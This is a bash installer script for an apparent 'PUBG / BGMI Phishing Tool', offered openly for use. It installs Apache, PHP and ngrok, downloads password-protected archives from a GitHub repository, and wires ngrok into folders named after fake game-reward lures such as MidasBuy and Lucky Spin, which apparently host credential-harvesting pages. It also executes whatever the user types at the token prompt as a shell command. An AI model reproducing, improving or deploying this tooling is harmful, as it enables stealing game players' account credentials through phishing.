#!/bin/bash
echo ""
clear
echo ""
echo ""
echo -e "\e[1;33m[\e[0m\e[1;77m~\e[0m\e[1;33m]\e[0m\e[1;32m Installing The PUBG / BGMI Phishing Tool Please Wait....  \e[0m"
echo -e ""
echo -e "\e[33m
          ██████╗ ██████╗  ██████╗ 
          ██╔══██╗██╔══██╗██╔═══██╗
          ██████╔╝██████╔╝██║   ██║
          ██╔═══╝ ██╔══██╗██║   ██║
          ██║     ██║  ██║╚██████╔╝
          ╚═╝     ╚═╝  ╚═╝ ╚═════╝  \e[0m\n"
echo ""
echo ""
echo -e "\e[1;33m[\e[0m\e[1;77m~\e[0m\e[1;33m]\e[0m\e[1;32m \e[95m Onine Hacking \e[0m"
echo ""
echo ""
printf "\e[31m[\e[32m★\e[31m]\e[32m Enter Pro Version Activation Key\e[m "
echo ""
echo ""
read -p $'\e[1;40m\e[31m[\e[32m*\e[31m]\e[32m Enter Key : \e[0m' option
echo""
echo""
echo""

if [[ $option == *'OHSMPRO333'* ]]; then
clear
sudo apt-get install apache2 -y
apt install 
apt install ruby -y
apt install php -y
apt install jq -y
apt install tail -y
apt install curl -y
apt install zip -y
apt install unrar -y
apt install rar -y
pkg install wget -y
pkg install ruby -y
pkg install gem -y
gem install lolcat
apt install php -y
apt install tail -y
apt install curl -y
apt install unrar -y
systemctl start apache2
apt install ruby -y
apt-get install ruby -y
apt install gem -y
gem install lolcat
apt install gnome-terminal -y
clear
rm -rf SUMAN
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip --no-check-certificate
unzip ngrok-stable-linux-arm.zip
wget https://github.com/Online-Hacking/Mr-OnlineHacking/raw/main/OnlineHacking/SUMAN/PUBG-BGMI/SUMAN-PUBG.rar
wget https://github.com/Online-Hacking/Mr-OnlineHacking/raw/main/OnlineHacking/SUMAN/PUBG-BGMI/SUMAN-BGMI.rar
unrar x -Password SUMAN-PUBG.rar
unrar x -Password SUMAN-BGMI.rar
rm -rf ngrok-stable-linux-arm.zip  SUMAN-PUBG.rar SUMAN-BGMI.rar
cp -R ngrok SUMAN/Collect-EVENT-LINE/
cp -R ngrok SUMAN/Collect-MC-Larent-Car/
cp -R ngrok SUMAN/Lucky-Spin-Godzila-S19/
cp -R ngrok SUMAN/MidasBuy/
cp -R ngrok SUMAN/SPIN-EVENT/
cp -R ngrok SUMAN/X-Suit/
cp -R ngrok SUMAN1/COLLECT-S19-ID/
cp -R ngrok SUMAN1/Godzilla-LuckySpin/
cp -R ngrok SUMAN1/RPS19-COLLECT/
cp -R ngrok SUMAN1/X-Suit-LuckySpin/
chmod 7777 OnlineHacking-Phishing
clear
echo ""
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Visit \e[32mngrok.com \e[m "
echo ""
echo -e "\e[31m[\e[32m*\e[31m]\e[33m Sign up & get ngrok authtoken \e[m "
echo ""
sleep 1
echo ""
read -p $'\e[31m[\e[32m*\e[31m]\e[33m Enter The Ngrok Token [Ex. ./ngrok authtoken 1Y7IU ] : \e[0m' token
$token
sleep2
echo
clear
echo 
echo 
echo 
echo -e "\e[35m[+] Connect Online Hacking PUBG BGMI Hacking Server......  \e[m "
sleep 6
echo 
echo 
clear
echo -e $'\e[1;91m\e[0m\e[1;33m\e[0m\e[1;96m\e[0m\e[1;92m  ---------------------------------   \e[1;91m\e[0m'
echo -e $'\e[1;91m\e[0m\e[1;33m\e[0m\e[1;90m\e[0m\e[1;92m !!    Installation Successfull   !!  \e[1;91m\e[0m'
echo -e $'\e[1;91m\e[0m\e[1;33m\e[0m\e[1;96m\e[0m\e[1;92m  ---------------------------------   \e[1;91m\e[0m'
sleep 4
echo 
echo -e "\e[1m \e[36m[+] There PUBG / BGMI Phishing Tool Script for Android \e[m \e[21"
echo 
echo 
echo -e "\e[92m[+] To run the tool type :\e[93m ./OnlineHacking-Phishing \e[m "
echo 

fi

sleep 10
echo 
exit
